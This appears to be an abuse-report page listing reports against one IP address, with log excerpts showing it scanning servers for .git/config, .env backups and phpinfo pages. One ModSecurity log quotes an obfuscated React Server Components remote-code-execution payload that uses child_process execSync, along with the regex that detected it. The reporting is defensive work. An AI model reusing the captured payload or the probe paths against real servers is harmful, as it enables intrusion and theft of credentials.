๐ฉ๐ช
Blexyel
2026-09-17 17:33:51
(1 day ago)
34.154.63.67 - - [17/Sep/2026:19:33:50 +0200] "GET /.git/config HTTP/1.1" 404 120 "-" "Mozilla/5.0 ( ...
show more
34.154.63.67 - - [17/Sep/2026:19:33:50 +0200] "GET /.git/config HTTP/1.1" 404 120 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
...
show less
Brute-Force
Web App Attack
๐ซ๐ท
phoenix1jl96
2026-09-17 15:47:02
(2 days ago)
2026/09/17 17:47:01 [error] 4640#4640: *1078 open() "/home/user-data/www/default/mailer/.env" failed ...
show more
2026/09/17 17:47:01 [error] 4640#4640: *1078 open() "/home/user-data/www/default/mailer/.env" failed (2: No such file or directory), client: 34.154.63.67, server: autodiscover.test.ledemon.us, request: "GET /mailer/.env HTTP/1.1", host: "autodiscover.test.ledemon.us"
2026/09/17 17:47:01 [error] 4640#4640: *1078 open() "/usr/local/lib/roundcubemail/.env" failed (2: No such file or directory), client: 34.154.63.67, server: autodiscover.test.ledemon.us, request: "GET /mail/.env HTTP/1.1", host: "autodiscover.test.ledemon.us"
...
show less
DNS Compromise
DNS Poisoning
DDoS Attack
Ping of Death
Web Spam
Email Spam
Blog Spam
Port Scan
Hacking
Brute-Force
Bad Web Bot
SSH
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-17 14:15:36
(2 days ago)
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Sep 17 10:15:31.130977 2026] [security2:error] [pid 16553:tid 16553] [client 34.154.63.67:36464] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.technologymoods.com"] [uri "/.git/config"] [unique_id "aqv2A_pZhHGB7E4F37HFoAAAAAw"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฉ๐ช
4server
2026-09-17 13:27:01
(2 days ago)
[ThuSep1715:26:59.6468542026][security2:error][pid2241086:tid2241191][client34.154.63.67:0]ModSecuri ...
show more
[ThuSep1715:26:59.6468542026][security2:error][pid2241086:tid2241191][client34.154.63.67:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"autodiscover.tcservices.ch\"][uri\"/\"][unique_id\"aqvqo2xYCvsLFVXN9aSqZgAAABE\"]
show less
Port Scan
Brute-Force
Web App Attack
๐บ๐ธ
Rocky Mountain Bioengineering Symposium
2026-09-17 10:26:46
(2 days ago)
[Thu Sep 17 04:26:41.168561 2026] [authz_core:error] [pid 105755:tid 140602599536192] [client 34.154 ...
show more
[Thu Sep 17 04:26:41.168561 2026] [authz_core:error] [pid 105755:tid 140602599536192] [client 34.154.63.67:45374] AH01630: client denied by server configuration: /var/www/horde/.env.bak
[Thu Sep 17 04:26:45.855693 2026] [authz_core:error] [pid 105755:tid 140601894876736] [client 34.154.63.67:45374] AH01630: client denied by server configuration: /var/www/horde/.env.dist
[Thu Sep 17 04:26:45.969737 2026] [authz_core:error] [pid 105755:tid 140602591143488] [client 34.154.63.67:45374] AH01630: client denied by server configuration: /var/www/horde/.env.swp
...
show less
Bad Web Bot
๐บ๐ธ
TPI-Abuse
2026-09-17 10:25:44
(2 days ago)
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Sep 17 06:25:38.262981 2026] [security2:error] [pid 29061:tid 29061] [client 34.154.63.67:54024] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.sympalais.com"] [uri "/.git/config"] [unique_id "aqvAIkyKgAP3CwA2O1sp2gAAABg"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-17 09:28:07
(2 days ago)
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Sep 17 05:28:01.657650 2026] [security2:error] [pid 8164:tid 8164] [client 34.154.63.67:0] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.swarnar.com"] [uri "/.git/config"] [unique_id "aquyocfVowpGcdtMnfcVvgAAAA4"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
factor1
2026-09-17 08:24:57
(2 days ago)
CrowdSec at apollo Reports Abuse
Web App Attack
๐ซ๐ท
dynamix
2026-09-17 03:15:53
(2 days ago)
Multiple WAF Violations
Web App Attack
๐ณ๐ฑ
debestelapp
2026-09-17 02:50:15
(2 days ago)
Web App Attack
๐จ๐ญ
Kepler-1649c
2026-09-16 22:05:14
(2 days ago)
Detected Attack: React.Server.Components.react-flight.Remote.Code.Execution
Hacking
๐บ๐ธ
TPI-Abuse
2026-09-16 17:22:13
(2 days ago)
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Sep 16 13:22:05.891526 2026] [security2:error] [pid 17436:tid 17436] [client 34.154.63.67:49024] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "articulaterecords.com"] [uri "/.git/config"] [unique_id "aqrQPXN6zeil3cpnXSdQugAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-16 16:58:35
(3 days ago)
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Sep 16 12:58:29.846688 2026] [security2:error] [pid 4475:tid 4475] [client 34.154.63.67:38172] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arthuryeung.net"] [uri "/.git/config"] [unique_id "aqrKtbOBWwgPA1YIFN5MZgAAAAQ"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-16 16:15:11
(3 days ago)
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 34.154.63.67 (67.63.154.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Sep 16 12:15:02.839622 2026] [security2:error] [pid 24376:tid 24376] [client 34.154.63.67:46406] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "artfranz.com"] [uri "/.git/config"] [unique_id "aqrAhkw_ThuYQerlvmoYDQAAACs"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ท๐ด
clauss
2026-09-16 16:06:57
(3 days ago)
34.154.63.67 - - [16/Sep/2026:19:06:56 +0300] "GET /phpinfo.php HTTP/2.0" 301 0 "-" "Mozilla/5.0 (Ma ...
show more
34.154.63.67 - - [16/Sep/2026:19:06:56 +0300] "GET /phpinfo.php HTTP/2.0" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.154.63.67 - - [16/Sep/2026:19:06:56 +0300] "GET /info.php HTTP/2.0" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
...
show less
Web App Attack